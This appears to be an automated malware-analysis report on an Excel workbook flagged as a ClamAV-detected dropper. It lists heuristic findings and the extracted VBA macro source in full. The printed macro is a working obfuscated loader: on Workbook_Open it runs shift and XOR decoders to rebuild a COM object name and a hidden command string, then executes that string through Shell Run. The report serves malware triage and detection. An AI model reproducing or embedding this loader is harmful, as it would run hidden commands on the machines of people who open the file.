Verdict: MALICIOUS
Risk score: 288
Heuristics: 6
- ClamAV: Xls.Dropper.Agent-7574312-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7574312-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
  ```vba
  Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6"))))
  ```
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  ```vba
  Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6"))))
  ```
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  ```vba
  Public Sub Workbook_Open()
  ```
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3615 bytes | d8a71ddaf1eb8f5ecf44b46457bf30d40552ecc50f00de15157052e9002475af |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 15872 bytes | 81608392fffca799ea0948f21a92095b6327d094a49e28d172e9278a7a6127ff |

Preview script for macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Set objShell = CreateObject(NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", (UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("7<868?8=879<8=<L7H8K9<8J8;", "6"))))
Dim NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz As String
NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz = NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX("HASJUHFSAHFSAIJUFHSAOLSA", UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq("979I9J969G9;9H8:8:8G=J8:978L=;<H8J8H8:8I9?8=8>8=8L898;9?878;8G<78G9L89869G9?=;<H7L=96?8<8>9=8:8<<7=K8?9G8;8H988L8I<<=H8L8I9J=>8?8G9?8:8I9>=97897988=8L9><<6>9<9;<<779<896G8<9I898<8=<><76>9I9<8<8J9I8H976K8L9L8:<6<79H9;9J9G8<=I<==I8I8I8798=6<<889I8==G8L9:9<869I8>9<989G<:969K8J=:<J<H8?9J9==87;9<8=8;<9<76L8L8J979;8>8;8L=H69969<<<<<===H6L8J9<=K6;9=8889969;<><H968K8:<G6<8K8J9L8J<76J89978:8>968H87878?9J<><<7;9H8:8;8<769K8J969:9H8?=H<;8J8L8;=6678J8H89<G<L7G9J8:9K8I9I8G8J=J6:9=8?=:<>", "6"))
Dim sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG As String
sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG = NOeEnykYtlFcJMctqtFDGeJspgvTjKQUGVByVjZtQCEZTQMNWcfHBclDFmOGDQKEqlqJKz
objShell.Run (sbTMIZaEttThRHeInzjTsjUSpzMUEDvDDXEYIKphdWNpIrUYuhSrZrcJGBWIhazLTPeuCG)
End Sub
Public Function NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs, ((lonDataPtr Mod Len(tOhhvRZiyZIROYFBOGwVANIErrtCHUYIlcjhIUxNDBykKbGRtPMfSNsfayLEsWaeVVgmKs)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
NAfEeUYBBmAvAWRiMkxRKGlDQLwYgBruJGIOpxCPrOBYaqCzeHwqgXJHObJTYAqzQGmONX = strDataOut
End Function
Public Function UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL As String, second As Integer)
Dim first As Integer
For first = 1 To Len(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL)
Mid(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL, first, 1) = Chr(Asc(Mid(OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL, first, 1)) - second)
Next first
UQFEHZBRTTazYTRBNgkrIBHLZvgfbzECiETvIlyLaZDPBzcLLnsfYSRnIPeLOrppOXmoAq = OwitQDTMJvoVTIHuykIAnNcnSjEOBziIKUYQxACipQFErtXhioZBBVDVUPbBUFLfhBKykL
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```

Detection for vbaProject_00.bin:

- ClamAV: Xls.Dropper.Agent-7574312-0
- Obfuscation or payload: unlikely